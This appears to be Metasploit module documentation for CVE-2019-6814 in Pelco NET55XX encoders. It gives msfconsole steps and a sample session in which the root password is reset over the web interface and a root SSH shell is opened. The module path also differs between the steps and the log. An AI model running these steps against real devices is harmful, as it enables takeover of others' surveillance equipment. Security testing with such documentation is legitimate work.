## Vulnerable Application Schneider Electric Pelco NET55XX Encoder (CVE 2019-6814) Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550). This module exploits an inadequate access control vulnerability creating a malicious JSON request to the `webUI` encoder, thus allowing the SSH service to be enabled and changing the root password. ## Verification Steps - [ ] Start `msfconsole` - [ ] `use exploit/linux/http/schneider_electric_net55xx_encoder` - [ ] `set RHOSTS [rhosts]` - [ ] `set RPORT [rport]` - [ ] `set NEW_PASSWORD [new password]` - [ ] `exploit` - [ ] Verify you get a root shell ## Options This module can be as simple as setting the `RHOST` and `NEW_PASSWORD` option, and you're ready to go. **NEW_PASSWORD** You should set a new SSH password to the vulnerable device. ## Scenarios **Schneider Electric Pelco Encoder NET5501-XT** msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RHOSTS 192.168.34.2 RHOSTS => 192.168.34.2 msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RPORT 80 RPORT => 80 msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set NEW_PASSWORD msfrapid7 NEW_PASSWORD => msfrapid7 msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > run [] 192.168.34.2:22 - Attempt to start a SSH connection... [] 192.168.34.2:80 - Attempt to change the root password... [+] 192.168.34.2:80 - Successfully changed the root password... [+] 192.168.34.2:22 - Session established [] Found shell. [] Command shell session 1 opened (192.168.34.3:37033 -> 192.168.34.2:22) at 2019-07-03 10:57:07 -0400 uname -a;id Linux NET5501-XT-K61200103 2.6.37 #1 PREEMPT Fri Aug 8 04:33:08 KST 2014 armv7l unknown uid=0(root) gid=0(root) groups=0(root)